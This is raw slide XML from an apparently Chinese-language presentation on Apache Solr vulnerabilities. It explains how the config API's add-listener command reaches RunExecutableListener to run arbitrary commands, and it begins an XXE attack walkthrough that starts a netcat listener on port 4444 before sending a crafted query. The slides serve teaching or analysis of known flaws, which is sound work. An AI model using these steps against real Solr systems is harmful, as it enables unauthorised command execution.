              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Zabbix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用来监测企业内部的网络流量和主机情况。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B6307021-C69E-4C21-AFBD-A3326B309D65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="545513" y="2788200"/>
            <a:ext cx="5075858" cy="1478570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F0B5ED3C-4996-44C9-93C8-0D7DD12ED11E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5764694" y="2318074"/>
            <a:ext cx="6061906" cy="1971429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3CA9CF6B-98B0-41AB-9FB1-F528BC6CB6C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008026" y="4377919"/>
            <a:ext cx="9513336"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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>搜索服务：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>为网站运维人员提供更加快捷方便的搜索服务。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3B1B71DC-5AEA-4B5C-A78C-97DBC5EA576D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3588024" y="4839584"/>
            <a:ext cx="4620109" cy="1901754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24481463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5DE2980-80B0-4FB4-8F00-30AB4C6BDE5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{FA7CB4E8-98A5-4934-952D-E91A2E572DAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1658143"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RunExecutableListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>类中使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Runtime.getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>().exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>方法，可用于在某些特定事件中执行任意命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1865F5BF-35F8-4BD9-92EC-725F46C1A80E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="2731850"/>
            <a:ext cx="7936186" cy="2701541"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29394497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7544D2C-C140-4002-94AC-FC18EADF3A4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3332FEE3-E5A2-4A55-882A-2E55BA7B1E6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1838670"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>config API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>传入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>add-listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>命令即可调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RunExecutableListene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>进行初始化，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>config API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SolrCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Collections API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SolrCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SolrCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>是基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Solr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Zookeeper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的分布式搜索方案。它的主要思想是使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Zookeeper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>作为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SolrCloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>集群的配置信息中心，统一管理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>solrcloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的配置，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>solrconfig.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>schema.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>），所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>只影响</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Solrcloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>分布式系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32243484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02F3311-071B-4717-9B41-89344D9DC9DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>漏洞原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C51D278E-D25E-4968-B82A-B673F7F28B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954158" y="1851920"/>
            <a:ext cx="5141846" cy="4853679"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>代码中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”exe”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>内容都可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的方式传入，所以在没有访问控制的情况下任何人都可以通过该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>config API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>达到任意命令执行的操作。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>查看代码，我们可以知道能够触发命令执行的事件有两个：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>postCommit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>newSearcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>newSearcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的调用，是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> /config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>操作发生后，立即就能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>core.reload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>操作，所以可以立即触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>postCommit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>只能是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> /config </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>后，存储新的配置信息，然后进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>操作，再进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>core.reload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>操作，从而触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DDC62918-7C7F-48DA-90D4-3DB8DD9E4CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172203" y="785728"/>
            <a:ext cx="4875213" cy="3234615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{528C8936-B653-4B8D-B7A6-9264CC2A50BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094412" y="4594832"/>
            <a:ext cx="5270500" cy="1644650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2611742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A9DA492-65DC-42B0-9AB2-411495C00932}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{406A3E00-E463-4504-856F-11A5CB5D3B6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1785661"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>首先，我们进行简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注入攻击，通过攻击是否成功来确认该漏洞是否存在。在攻击端使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>netCat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>监听</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>端口</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>构造特殊的查询字符串，来实施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>构造的特殊查询字符串如下所示，对其进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>编码后，在浏览器输入框中输入，即能进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8A8A8236-B971-4CED-BA4F-1AF0F05A7CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
